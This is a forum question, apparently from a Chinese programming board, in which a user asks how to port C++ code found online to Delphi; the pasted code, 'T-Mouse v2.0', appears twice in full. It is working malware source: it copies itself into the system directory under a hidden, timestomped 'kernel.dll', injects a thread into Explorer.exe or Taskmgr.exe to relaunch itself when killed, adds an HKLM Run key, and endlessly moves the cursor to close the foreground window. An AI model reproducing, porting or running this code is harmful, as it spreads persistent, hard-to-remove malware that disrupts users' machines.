J
jingzux
Unregistered / Unconfirmed
GUEST, unregistred user!
以下是我从网上看到的VC代码,怎么转到DELPHI代码:
/*
---[ T-Mouse v2.0, by TOo2y ]---
---[ E-mail: TOo2y@safechina.net ]---
---[ HomePage: www.safechina.net ]---
---[ Date: 11-27-2002 ]---
*/
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <conio.h>
#include <psapi.h>
typedef struct _remoteparameter
{
DWORD rpoutputdebugstring;
DWORD rpopenprocess;
DWORD rpwaitforsingleobject;
DWORD rpfindfirstfile;
DWORD rpcopyfile;
DWORD rpfindclose;
DWORD rpwinexec;
DWORD rpmousepid;
HANDLE rpprocesshandle;
HANDLE rpfilehandle;
TCHAR rptname[MAX_PATH];
TCHAR rpkname[MAX_PATH];
char rpwinexecname[MAX_PATH];
WIN32_FIND_DATA rpfdata;
TCHAR rpoperror[30];
TCHAR rpffferror[30];
TCHAR rpcferror[30];
TCHAR rpfcerror[30];
TCHAR rpweerror[30];
TCHAR rpstring[30];
TCHAR rpwfsosignal[30];
}REMOTEPARAMETER, *PREMOTEPARAMETER;
DWORD WINAPI remote(LPVOID pvparam);
DWORD WINAPI watch(LPVOID pvparam);
DWORD processtopid(TCHAR *processname);
HANDLE createremote(PTSTR,PTSTR);
void start(void);
HANDLE wthread;
TCHAR *name1=_T("//T-Mouse.exe");
TCHAR *name2=_T("//kernel.dll");
int main()
{
WIN32_FIND_DATA fdata;
HANDLE ffhandle;
HANDLE fchandle;
SYSTEMTIME stime;
FILETIME ftime;
TCHAR syspath[MAX_PATH];
TCHAR curname[MAX_PATH];
TCHAR tname[MAX_PATH];
TCHAR kname[MAX_PATH];
int ret;
HANDLE rthread;
HWND hwnd;
RECT rt;
POINT ptnew;
TCHAR title[250];
WINDOWPLACEMENT wp;
system("color 0A");
start();
ret=GetSystemDirectory(syspath,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetSystemDirectory Error/n"));
getche();
return -1;
}
_tcscpy(tname,syspath);
_tcscat(tname,name1);
_tcscpy(kname,syspath);
_tcscat(kname,name2);
ffhandle=FindFirstFile(tname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(GetLastError()==2)
{
ret=GetModuleFileName(NULL,curname,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetModuleFileName Error/n"));
getche();
return -1;
}
if(!CopyFile(curname,tname,TRUE))
{
OutputDebugString(_T("CopyFile Error/n"));
getche();
return -1;
}
}
else
{
OutputDebugString(_T("FindFirstFile Error/n"));
getche();
return -1;
}
}
else
if(!FindClose(ffhandle))
{
OutputDebugString(_T("FindClose Error/n"));
getche();
return -1;
}
ffhandle=FindFirstFile(kname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(GetLastError()==2)
{
ret=GetModuleFileName(NULL,curname,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetModuleFileName Error/n"));
getche();
return -1;
}
if(!CopyFile(curname,kname,TRUE))
{
OutputDebugString(_T("CopyFile Error/n"));
getche();
return -1;
}
fchandle=CreateFile(kname,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(fchandle==INVALID_HANDLE_VALUE)
{
OutputDebugString(_T("CreateFile Error/n"));
getche();
return -1;
}
memset(&stime,0,sizeof(stime));
stime.wYear=2002;
stime.wMonth=1;
stime.wDay=12;
stime.wDayOfWeek=5;
stime.wHour=1;
if(!SystemTimeToFileTime(&stime,&ftime))
{
OutputDebugString(_T("SystemTimeToFileTime Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
if(!SetFileTime(fchandle,&ftime,NULL,&ftime))
{
OutputDebugString(_T("SetFileTime Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
if(!SetFileAttributes(kname,
FILE_ATTRIBUTE_READONLY |
FILE_ATTRIBUTE_HIDDEN |
FILE_ATTRIBUTE_SYSTEM ))
{
OutputDebugString(_T("SetFileAttributes Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
CloseHandle(fchandle);
}
else
{
OutputDebugString(_T("FindFirstFile Error/n"));
getche();
return -1;
}
}
else
if(!FindClose(ffhandle))
{
OutputDebugString(_T("FindClose Error/n"));
getche();
return -1;
}
if((rthread=createremote(tname,kname))==NULL)
{
OutputDebugString(_T("CreateRemote Error/n"));
getche();
return -1;
}
wthread=CreateThread(NULL,0,watch,(LPVOID)rthread,0,NULL);
if(wthread==NULL)
{
OutputDebugString(_T("CreateThread Error/n"));
CloseHandle(rthread);
getche();
return -1;
}
while(1)
{
hwnd=GetForegroundWindow();
GetWindowRect(hwnd,&rt);
GetCursorPos(&ptnew);
GetWindowText(hwnd,title,250);
GetWindowPlacement(hwnd,&wp);
if(ptnew.x<rt.right-15)
ptnew.x+=3;
else
if(ptnew.x>rt.right-12)
ptnew.x-=3;
if(ptnew.y<rt.top+12)
ptnew.y+=3;
else
if(ptnew.y>rt.top+15)
ptnew.y-=3;
SetCursorPos(ptnew.x,ptnew.y);
if((ptnew.x>=rt.right-15) &&
(ptnew.x<=rt.right-12)
&&
(ptnew.y>=rt.top+12) &&
(ptnew.y<=rt.top+15)
&&
(wp.showCmd!=SW_SHOWMINIMIZED)
&&
(_tcslen(title)!=0))
{
mouse_event(MOUSEEVENTF_LEFTDOWN,ptnew.x,ptnew.y,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,ptnew.x,ptnew.y,0,0);
}
Sleep(1);
}
getche();
return 0;
}
DWORD processtopid(TCHAR *processname)
{
DWORD lpidprocesses[1024],cbneeded,cprocesses;
HANDLE hprocess;
HMODULE hmodule;
UINT i;
TCHAR normalname[MAX_PATH]=_T("UnknownProcess");
if(!EnumProcesses(lpidprocesses,sizeof(lpidprocesses),&cbneeded))
{
OutputDebugString(_T("EnumProcesses Error/n"));
return -1;
}
cprocesses=cbneeded/sizeof(DWORD);
for(i=0;i<cprocesses;i++)
{
hprocess=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,lpidprocesses);
if(hprocess)
{
if(EnumProcessModules(hprocess,&hmodule,sizeof(hmodule),&cbneeded))
{
GetModuleBaseName(hprocess,hmodule,normalname,sizeof(normalname));
if(!_tcsicmp(normalname,processname))
{
CloseHandle(hprocess);
return (lpidprocesses);
}
}
}
}
CloseHandle(hprocess);
return 0;
}
HANDLE createremote(PTSTR ctname,PTSTR ckname)
{
HANDLE ethread;
HANDLE rphandle;
TCHAR name[2][15];
TCHAR *remotethr;
TCHAR *remotepar;
DWORD remotepid;
int cb;
int signal;
HINSTANCE hkernel32;
REMOTEPARAMETER rp;
_tcscpy(name[0],_T("Explorer.exe"));
_tcscpy(name[1],_T("Taskmgr.exe"));
signal=1;
while(1)
{
remotepid=processtopid(name[(++signal)%2]);
if(remotepid==-1)
{
return NULL;
}
else
if(remotepid==0)
{
if(signal%2==0)
{
OutputDebugString(_T("Remote Process Explorer isn't running/n"));
}
else
{
OutputDebugString(_T("Remote Process Taskmgr isn't running/n"));
}
Sleep(1000);
continue;
}
rphandle=OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE,
FALSE,remotepid);
if(rphandle==NULL)
{
Sleep(1000);
continue;
}
else
{
break;
}
}
cb=sizeof(TCHAR)*4*1024;
remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(remotethr==NULL)
{
OutputDebugString(_T("VirtualAllocEx for Thread Error/n"));
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
{
OutputDebugString(_T("WriteProcessMemory for Thread Error/n"));
CloseHandle(rphandle);
return NULL;
}
{
memset(&rp,0,sizeof(rp));
rp.rpmousepid=GetCurrentProcessId();
_tcscpy(rp.rpstring,_T("i am in remote process/n"));
_tcscpy(rp.rpcferror,_T("CopyFile Error/n"));
_tcscpy(rp.rpfcerror,_T("FindClose Error/n"));
_tcscpy(rp.rpffferror,_T("FindFirstFile Error/n"));
_tcscpy(rp.rpoperror,_T("OpenProcess Error/n"));
_tcscpy(rp.rpweerror,_T("WinExec Error/n"));
_tcscpy(rp.rpwfsosignal,_T("i am out of remote process/n"));
_tcscpy(rp.rptname,ctname);
_tcscpy(rp.rpkname,ckname);
WideCharToMultiByte(CP_ACP,0,ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
hkernel32=GetModuleHandle(_T("kernel32.dll"));
rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileW");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
}
cb=sizeof(TCHAR)*sizeof(rp);
remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
if(remotepar==NULL)
{
OutputDebugString(_T("VirtualAllocEx for Parameter Error/n"));
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
{
OutputDebugString(_T("WriteProcessMemory for Parameter Error:"));
CloseHandle(rphandle);
return NULL;
}
ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
if(ethread==NULL)
{
OutputDebugString(_T("CreateRemoteThread Error/n"));
CloseHandle(rphandle);
return NULL;
}
return ethread;
}
void start()
{
_tprintf(_T("---[ T-Mouse v2.0, by TOo2y ]---/n"));
_tprintf(_T("---[ E-mail: TOo2y@safechina.net ]---/n"));
_tprintf(_T("---[ HomePage: www.safechina.net ]---/n"));
_tprintf(_T("---[ Date: 11-27-2002 ]---/n/n"));
return;
}
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE wethread=(HANDLE)pvparam;
DWORD exitcode;
HKEY hkey;
TCHAR sname[MAX_PATH];
TCHAR wtname[MAX_PATH];
TCHAR wkname[MAX_PATH];
TCHAR lpdata[MAX_PATH];
LPCTSTR rgspath=_T("Software//Microsoft//Windows//CurrentVersion//Run");
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
int ret;
if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
OutputDebugString(_T("GetSystemDirectory in watch Error/n"));
return -1;
}
_tcscpy(wtname,sname);
_tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);
while(1)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_QUERY_VALUE Error/n"));
break;
}
ret=RegQueryValueEx(hkey,_T("T-Mouse"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_WRITE Error/n"));
break;
}
ret=RegSetValueEx(hkey,_T("T-Mouse"),NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegSetValueEx Error/n"));
break;
}
}
GetExitCodeThread(wethread,&exitcode);
if(exitcode!=STILL_ACTIVE)
{
wethread=createremote(wtname,wkname);
}
Sleep(1000);
}
return 0;
}
DWORD WINAPI remote(LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
typedef VOID (WINAPI *EOutputDebugString)(LPCTSTR);
typedef HANDLE (WINAPI *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (WINAPI *EWaitForSingleObject)(HANDLE, DWORD);
typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (WINAPI *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL (WINAPI *EFindClose)(HANDLE);
typedef UINT (WINAPI *EWinExec)(LPCSTR, UINT);
EOutputDebugString tOutputDebugString;
EOpenProcess tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile tFindFirstFile;
ECopyFile tCopyFile;
EFindClose tFindClose;
EWinExec tWinExec;
tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;
tOutputDebugString(erp->rpstring);
erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
tOutputDebugString(erp->rpoperror);
return -1;
}
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{
tOutputDebugString(erp->rpffferror);
if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
{
tOutputDebugString(erp->rpcferror);
return -1;
}
}
if(!tFindClose(erp->rpfilehandle))
{
tOutputDebugString(erp->rpfcerror);
return -1;
}
if(tWinExec(erp->rpwinexecname, 0)<=31)
{
tOutputDebugString(erp->rpweerror);
return -1;
}
return 0;
}
/*
---[ T-Mouse v2.0, by TOo2y ]---
---[ E-mail: TOo2y@safechina.net ]---
---[ HomePage: www.safechina.net ]---
---[ Date: 11-27-2002 ]---
*/
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <conio.h>
#include <psapi.h>
typedef struct _remoteparameter
{
DWORD rpoutputdebugstring;
DWORD rpopenprocess;
DWORD rpwaitforsingleobject;
DWORD rpfindfirstfile;
DWORD rpcopyfile;
DWORD rpfindclose;
DWORD rpwinexec;
DWORD rpmousepid;
HANDLE rpprocesshandle;
HANDLE rpfilehandle;
TCHAR rptname[MAX_PATH];
TCHAR rpkname[MAX_PATH];
char rpwinexecname[MAX_PATH];
WIN32_FIND_DATA rpfdata;
TCHAR rpoperror[30];
TCHAR rpffferror[30];
TCHAR rpcferror[30];
TCHAR rpfcerror[30];
TCHAR rpweerror[30];
TCHAR rpstring[30];
TCHAR rpwfsosignal[30];
}REMOTEPARAMETER, *PREMOTEPARAMETER;
DWORD WINAPI remote(LPVOID pvparam);
DWORD WINAPI watch(LPVOID pvparam);
DWORD processtopid(TCHAR *processname);
HANDLE createremote(PTSTR,PTSTR);
void start(void);
HANDLE wthread;
TCHAR *name1=_T("//T-Mouse.exe");
TCHAR *name2=_T("//kernel.dll");
int main()
{
WIN32_FIND_DATA fdata;
HANDLE ffhandle;
HANDLE fchandle;
SYSTEMTIME stime;
FILETIME ftime;
TCHAR syspath[MAX_PATH];
TCHAR curname[MAX_PATH];
TCHAR tname[MAX_PATH];
TCHAR kname[MAX_PATH];
int ret;
HANDLE rthread;
HWND hwnd;
RECT rt;
POINT ptnew;
TCHAR title[250];
WINDOWPLACEMENT wp;
system("color 0A");
start();
ret=GetSystemDirectory(syspath,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetSystemDirectory Error/n"));
getche();
return -1;
}
_tcscpy(tname,syspath);
_tcscat(tname,name1);
_tcscpy(kname,syspath);
_tcscat(kname,name2);
ffhandle=FindFirstFile(tname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(GetLastError()==2)
{
ret=GetModuleFileName(NULL,curname,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetModuleFileName Error/n"));
getche();
return -1;
}
if(!CopyFile(curname,tname,TRUE))
{
OutputDebugString(_T("CopyFile Error/n"));
getche();
return -1;
}
}
else
{
OutputDebugString(_T("FindFirstFile Error/n"));
getche();
return -1;
}
}
else
if(!FindClose(ffhandle))
{
OutputDebugString(_T("FindClose Error/n"));
getche();
return -1;
}
ffhandle=FindFirstFile(kname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(GetLastError()==2)
{
ret=GetModuleFileName(NULL,curname,MAX_PATH);
if(ret==0)
{
OutputDebugString(_T("GetModuleFileName Error/n"));
getche();
return -1;
}
if(!CopyFile(curname,kname,TRUE))
{
OutputDebugString(_T("CopyFile Error/n"));
getche();
return -1;
}
fchandle=CreateFile(kname,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(fchandle==INVALID_HANDLE_VALUE)
{
OutputDebugString(_T("CreateFile Error/n"));
getche();
return -1;
}
memset(&stime,0,sizeof(stime));
stime.wYear=2002;
stime.wMonth=1;
stime.wDay=12;
stime.wDayOfWeek=5;
stime.wHour=1;
if(!SystemTimeToFileTime(&stime,&ftime))
{
OutputDebugString(_T("SystemTimeToFileTime Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
if(!SetFileTime(fchandle,&ftime,NULL,&ftime))
{
OutputDebugString(_T("SetFileTime Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
if(!SetFileAttributes(kname,
FILE_ATTRIBUTE_READONLY |
FILE_ATTRIBUTE_HIDDEN |
FILE_ATTRIBUTE_SYSTEM ))
{
OutputDebugString(_T("SetFileAttributes Error/n"));
CloseHandle(fchandle);
getche();
return -1;
}
CloseHandle(fchandle);
}
else
{
OutputDebugString(_T("FindFirstFile Error/n"));
getche();
return -1;
}
}
else
if(!FindClose(ffhandle))
{
OutputDebugString(_T("FindClose Error/n"));
getche();
return -1;
}
if((rthread=createremote(tname,kname))==NULL)
{
OutputDebugString(_T("CreateRemote Error/n"));
getche();
return -1;
}
wthread=CreateThread(NULL,0,watch,(LPVOID)rthread,0,NULL);
if(wthread==NULL)
{
OutputDebugString(_T("CreateThread Error/n"));
CloseHandle(rthread);
getche();
return -1;
}
while(1)
{
hwnd=GetForegroundWindow();
GetWindowRect(hwnd,&rt);
GetCursorPos(&ptnew);
GetWindowText(hwnd,title,250);
GetWindowPlacement(hwnd,&wp);
if(ptnew.x<rt.right-15)
ptnew.x+=3;
else
if(ptnew.x>rt.right-12)
ptnew.x-=3;
if(ptnew.y<rt.top+12)
ptnew.y+=3;
else
if(ptnew.y>rt.top+15)
ptnew.y-=3;
SetCursorPos(ptnew.x,ptnew.y);
if((ptnew.x>=rt.right-15) &&
(ptnew.x<=rt.right-12)
&&
(ptnew.y>=rt.top+12) &&
(ptnew.y<=rt.top+15)
&&
(wp.showCmd!=SW_SHOWMINIMIZED)
&&
(_tcslen(title)!=0))
{
mouse_event(MOUSEEVENTF_LEFTDOWN,ptnew.x,ptnew.y,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,ptnew.x,ptnew.y,0,0);
}
Sleep(1);
}
getche();
return 0;
}
DWORD processtopid(TCHAR *processname)
{
DWORD lpidprocesses[1024],cbneeded,cprocesses;
HANDLE hprocess;
HMODULE hmodule;
UINT i;
TCHAR normalname[MAX_PATH]=_T("UnknownProcess");
if(!EnumProcesses(lpidprocesses,sizeof(lpidprocesses),&cbneeded))
{
OutputDebugString(_T("EnumProcesses Error/n"));
return -1;
}
cprocesses=cbneeded/sizeof(DWORD);
for(i=0;i<cprocesses;i++)
{
hprocess=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,lpidprocesses);
if(hprocess)
{
if(EnumProcessModules(hprocess,&hmodule,sizeof(hmodule),&cbneeded))
{
GetModuleBaseName(hprocess,hmodule,normalname,sizeof(normalname));
if(!_tcsicmp(normalname,processname))
{
CloseHandle(hprocess);
return (lpidprocesses);
}
}
}
}
CloseHandle(hprocess);
return 0;
}
HANDLE createremote(PTSTR ctname,PTSTR ckname)
{
HANDLE ethread;
HANDLE rphandle;
TCHAR name[2][15];
TCHAR *remotethr;
TCHAR *remotepar;
DWORD remotepid;
int cb;
int signal;
HINSTANCE hkernel32;
REMOTEPARAMETER rp;
_tcscpy(name[0],_T("Explorer.exe"));
_tcscpy(name[1],_T("Taskmgr.exe"));
signal=1;
while(1)
{
remotepid=processtopid(name[(++signal)%2]);
if(remotepid==-1)
{
return NULL;
}
else
if(remotepid==0)
{
if(signal%2==0)
{
OutputDebugString(_T("Remote Process Explorer isn't running/n"));
}
else
{
OutputDebugString(_T("Remote Process Taskmgr isn't running/n"));
}
Sleep(1000);
continue;
}
rphandle=OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE,
FALSE,remotepid);
if(rphandle==NULL)
{
Sleep(1000);
continue;
}
else
{
break;
}
}
cb=sizeof(TCHAR)*4*1024;
remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(remotethr==NULL)
{
OutputDebugString(_T("VirtualAllocEx for Thread Error/n"));
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
{
OutputDebugString(_T("WriteProcessMemory for Thread Error/n"));
CloseHandle(rphandle);
return NULL;
}
{
memset(&rp,0,sizeof(rp));
rp.rpmousepid=GetCurrentProcessId();
_tcscpy(rp.rpstring,_T("i am in remote process/n"));
_tcscpy(rp.rpcferror,_T("CopyFile Error/n"));
_tcscpy(rp.rpfcerror,_T("FindClose Error/n"));
_tcscpy(rp.rpffferror,_T("FindFirstFile Error/n"));
_tcscpy(rp.rpoperror,_T("OpenProcess Error/n"));
_tcscpy(rp.rpweerror,_T("WinExec Error/n"));
_tcscpy(rp.rpwfsosignal,_T("i am out of remote process/n"));
_tcscpy(rp.rptname,ctname);
_tcscpy(rp.rpkname,ckname);
WideCharToMultiByte(CP_ACP,0,ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
hkernel32=GetModuleHandle(_T("kernel32.dll"));
rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileW");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
}
cb=sizeof(TCHAR)*sizeof(rp);
remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
if(remotepar==NULL)
{
OutputDebugString(_T("VirtualAllocEx for Parameter Error/n"));
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
{
OutputDebugString(_T("WriteProcessMemory for Parameter Error:"));
CloseHandle(rphandle);
return NULL;
}
ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
if(ethread==NULL)
{
OutputDebugString(_T("CreateRemoteThread Error/n"));
CloseHandle(rphandle);
return NULL;
}
return ethread;
}
void start()
{
_tprintf(_T("---[ T-Mouse v2.0, by TOo2y ]---/n"));
_tprintf(_T("---[ E-mail: TOo2y@safechina.net ]---/n"));
_tprintf(_T("---[ HomePage: www.safechina.net ]---/n"));
_tprintf(_T("---[ Date: 11-27-2002 ]---/n/n"));
return;
}
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE wethread=(HANDLE)pvparam;
DWORD exitcode;
HKEY hkey;
TCHAR sname[MAX_PATH];
TCHAR wtname[MAX_PATH];
TCHAR wkname[MAX_PATH];
TCHAR lpdata[MAX_PATH];
LPCTSTR rgspath=_T("Software//Microsoft//Windows//CurrentVersion//Run");
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
int ret;
if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
OutputDebugString(_T("GetSystemDirectory in watch Error/n"));
return -1;
}
_tcscpy(wtname,sname);
_tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);
while(1)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_QUERY_VALUE Error/n"));
break;
}
ret=RegQueryValueEx(hkey,_T("T-Mouse"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_WRITE Error/n"));
break;
}
ret=RegSetValueEx(hkey,_T("T-Mouse"),NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegSetValueEx Error/n"));
break;
}
}
GetExitCodeThread(wethread,&exitcode);
if(exitcode!=STILL_ACTIVE)
{
wethread=createremote(wtname,wkname);
}
Sleep(1000);
}
return 0;
}
DWORD WINAPI remote(LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
typedef VOID (WINAPI *EOutputDebugString)(LPCTSTR);
typedef HANDLE (WINAPI *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (WINAPI *EWaitForSingleObject)(HANDLE, DWORD);
typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (WINAPI *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL (WINAPI *EFindClose)(HANDLE);
typedef UINT (WINAPI *EWinExec)(LPCSTR, UINT);
EOutputDebugString tOutputDebugString;
EOpenProcess tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile tFindFirstFile;
ECopyFile tCopyFile;
EFindClose tFindClose;
EWinExec tWinExec;
tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;
tOutputDebugString(erp->rpstring);
erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
tOutputDebugString(erp->rpoperror);
return -1;
}
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{
tOutputDebugString(erp->rpffferror);
if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
{
tOutputDebugString(erp->rpcferror);
return -1;
}
}
if(!tFindClose(erp->rpfilehandle))
{
tOutputDebugString(erp->rpfcerror);
return -1;
}
if(tWinExec(erp->rpwinexecname, 0)<=31)
{
tOutputDebugString(erp->rpweerror);
return -1;
}
return 0;
}